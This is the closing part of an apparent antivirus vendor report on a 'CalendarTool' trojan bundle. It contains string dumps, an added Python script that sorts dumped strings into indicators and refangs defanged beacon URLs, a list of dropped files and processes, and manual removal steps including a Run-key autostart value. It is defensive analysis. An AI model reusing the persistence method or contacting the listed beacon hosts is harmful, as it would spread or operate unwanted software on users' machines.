SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
\\.\PhysicalDrive%d
\\.\Scsi%d:
127.0.0.1
http=
https=
5.1.2600.5512 (xpsp.080413-211
Calendar.exe
"%Program Files%\CalendarTool\2.0.0.11189\Calendar.exe" from_service
%Program Files%\CalendarTool\2.0.0.11189
%Documents and Settings%\%current user%\Application Data\CalendarTool\dump
%Program Files%\CalendarTool\2.0.0.11189\Calendar.exe
calendar.exe
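The string dumps above are the raw material for indicators, but they mix autostart keys, beacon URLs, named pipes and build paths with thousands of library diagnostics. As an added example, not part of the Lavasoft report and not the sample's own code, the Python below sorts strings of this kind into the buckets an analyst checks first and reverses the report's URL defanging, in which hXXp:// stands for http:// and VVV. for www.; the sample strings are copied from the CalendarServ.exe and Calendar.exe dumps above, while the TLD allow-list and the Winlogon pattern are assumptions of the example, not anything the dump shows.

```python
"""Triage of strings dumped from the CalendarTool processes.

Added example for this report; it is not Lavasoft's tooling or the sample's
own code. It sorts process-dump strings of the kind listed above into the
buckets an analyst checks first (persistence keys, network endpoints, named
pipes, build paths, kernel drivers, install/uninstall keys) and undoes the
report's URL defanging ("hXXp://", "VVV.").
"""
import re
from collections import defaultdict

# Strings copied verbatim from the CalendarServ.exe / Calendar.exe dumps above,
# plus an MRU key and a library diagnostic that must be discarded as noise.
SAMPLE_STRINGS = [
    r"Software\Microsoft\Windows\CurrentVersion\Run",
    r"Software\Microsoft\Windows\CurrentVersion\RunOnce",
    r"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run",
    r"Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad",
    r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU",  # MRU list, not autostart
    r"Software\Microsoft\Windows\CurrentVersion\Uninstall\{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}",
    "hXXp://VVV.theadvancedcalendar.com/cgi-bin-py/calendar_uu.cgi",
    "hXXp://VVV.theadvancedcalendar.com/cgi-bin-py/calendar_statistic.cgi",
    "hXXp://ime.baidu.jp/type/api/horoscope.php",
    "dump.theadvancedcalendar.com",
    r"\\.\pipe\I18NStat\c_s_w_u_y_g",
    r"D:\jenkins\workspace\calendar\Release\calendar.pdb",
    "WinHttpSendRequest",
    "btguard.sys",
    "btguard64.sys",
    "libpng warning: %s",
]

DEFANGED_URL = re.compile(r"^h(?:xx|tt)ps?://", re.I)
HOSTNAME = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$", re.I)
# Assumption: a short TLD allow-list keeps "sampler.begin"-style identifiers
# out of the network bucket; extend it for the dumps you actually triage.
TLDS = {"com", "net", "org", "info", "io", "ru", "cn", "jp", "br"}
NETWORK_API = re.compile(r"^(?:WinHttp|Internet|Http)[A-Z][A-Za-z]+$")
PERSISTENCE = [
    re.compile(r"\\Run(?:Once(?:Ex)?)?$", re.I),         # Run, RunOnce, RunOnceEx, Policies\Explorer\Run
    re.compile(r"\\ShellServiceObjectDelayLoad$", re.I),
    re.compile(r"\\Winlogon$", re.I),                     # assumption: not in this dump, common elsewhere
]


def refang(s: str) -> str:
    """Turn the report's hXXp://VVV.host form back into a real URL."""
    s = re.sub(r"^hxxp(s?)://", r"http\1://", s, flags=re.I)
    return re.sub(r"^(https?://)VVV\.", r"\1www.", s)


def classify(s: str):
    """Return the bucket for one dumped string, or None for noise."""
    s = s.strip()
    if not s:
        return None
    if DEFANGED_URL.match(s):
        return "network"
    if s.startswith("\\\\.\\pipe\\"):
        return "named_pipe"
    low = s.lower()
    if low.endswith(".pdb"):
        return "build_path"
    if low.endswith(".sys"):
        return "kernel_driver"
    if "\\uninstall\\" in low:
        return "uninstall_key"
    if any(p.search(s) for p in PERSISTENCE):
        return "persistence"
    if NETWORK_API.match(s):
        return "network_api"
    if HOSTNAME.match(s) and s.rsplit(".", 1)[1].lower() in TLDS:
        return "network"
    return None


def triage(strings):
    """Group strings by bucket, refanging URLs and dropping duplicates."""
    buckets = defaultdict(list)
    for s in strings:
        bucket = classify(s)
        if bucket is None:
            continue
        value = refang(s.strip()) if bucket == "network" else s.strip()
        if value not in buckets[bucket]:
            buckets[bucket].append(value)
    return dict(buckets)


if __name__ == "__main__":
    for bucket, values in triage(SAMPLE_STRINGS).items():
        print(f"[{bucket}]")
        for v in values:
            print("   ", v)
```

Explorer\RunMRU is deliberately kept out of the persistence bucket: it is the Run dialog's history list, not an autostart location, and the explorer.exe dump above is full of such look-alikes (RunMRU, OpenSaveMRU, TypedURLs) that only say what the desktop user did, not what the installer changed.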


Remove it with Ad-Aware

  1. Download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    imapi.exe:1932
    InstallHelper.exe:3084
    InstallHelper.exe:3480
    nst6.tmp.exe:2736
    nst6.tmp.exe:2804
    CalendarServ.exe:3180
    CalendarServ.exe:3156
    yeaplayer_br_ibd_bundle.exe:2328
    %original file name%.exe:1216
    rundll32.exe:1976
    setup.exe:1948
    setup.exe:348
    291734.exe:2712

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %WinDir%\Temp\g5z08pj0.TMP (146970 bytes)
    %Documents and Settings%\%current user%\Application Data\CalendarTool\dump\BugReportConfig.ini (940 bytes)
    %Documents and Settings%\All Users\Documents\Tools\Common\I18N\conf.db (759 bytes)
    %Documents and Settings%\LocalService\Application Data\CalendarTool\dump\BugReportConfig.ini (940 bytes)
    %Documents and Settings%\All Users\Documents\Baidu\Common\I18N\conf.db (759 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\61807c4bafc26bb2ed98e3e60f587cd6\291734.exe.info (24 bytes)
    C:\MINI.LOG (5089 bytes)
    %Documents and Settings%\All Users\Documents\Guid\Common\I18N\conf.db (759 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\INetC.dll (22 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P5SDE3AF\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KDYJ45YV\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\setup.exe (50903 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6KWD5RP0\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\ns3.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\nsExec.dll (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QY4FSATI\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\11082\YeaPlayer_br_IBD_Bundle.exe (141913 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\11075\51486_a.xml (8672 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\cookies (188 bytes)
    %Documents and Settings%\%current user%\Application Data\YeaPlayer_br_IBD_Bundle.exe (4185 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_today_pressed.png (172 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\DefaultConfig\Festival.json (1 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\Config7\Language.json (1 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_heart_color.png (440 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\CalendarEntry.dll (4316 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_pen_grey.png (248 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\CrashUL.exe (8165 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\Config7\Festival.json (1568 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_today_hover.png (174 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_pressed.png (189 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\Config8\Config.json (2 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_left_normal.png (995 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\InstallHelper.exe (19114 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_pen_half.png (217 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchup_normal.png (481 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\img_arrow_up.png (132 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_mode_normal.png (1 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\Config-3\Festival.json (16 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_hover.png (179 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\Report.exe (5902 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_unselect.png (1 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_radio_selected.png (1 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\main_bg_frame.png (1260 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\calendar.exe (47962 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_left_pressed.png (1 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_classsic.png (3 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchup_pressed.png (1 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_mode_pressed.png (1 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_money_half.png (443 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\CrashReport.exe (16453 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_normal.png (179 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_radio_hover.png (1 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\Config9\Festival.json (12 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\EVPKernel.dll (23698 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\DefaultConfig\Language.json (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\System.dll (11 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_today_normal.png (177 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\Config-3\Language.json (1 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\CalendarServ.exe (2318 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_right_normal.png (994 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchdown_hover.png (1 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_disabled.png (179 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_right_hover.png (993 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\Config8\Language.json (1 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_selected.png (1 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_aero1.png (3 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_hover.png (949 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_aero.png (3 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_clover_grey.png (452 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_right_pressed.png (1 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\img_arrow_down.png (131 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\Config8\Festival.json (15 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchdown_normal.png (519 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_left_hover.png (995 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\Config7\Festival_special.json (6 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_modern.png (2 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_pen_color.png (235 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_money_color.png (606 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\EVPConfig.ini (234 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_mode_hover.png (1 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_menu.png (989 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchup_hover.png (1 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_clover_half.png (348 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_clover_color.png (509 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_heart_grey.png (417 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\EVPNet.dll (11930 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\Config9\Config.json (2 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\Config9\Language.json (1 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\EVPHelp.dll (10720 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\CrashReportModuleConf.ini (673 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_normal.png (955 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\EVPDR.dll (10408 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\skin.xml (1568 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\Config7\Config.json (2 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\Config-3\Config.json (3 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_radio_normal.png (1 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\scroll.bmp (1568 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchdown_pressed.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst6.tmp.exe (19114 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_heart_half.png (307 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\main_bg_bottom.png (8 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_main.png (1 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\EVPTask.dll (13763 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\DefaultConfig\Config.json (2 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_money_grey.png (576 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "YeaInstaller" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\setup.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
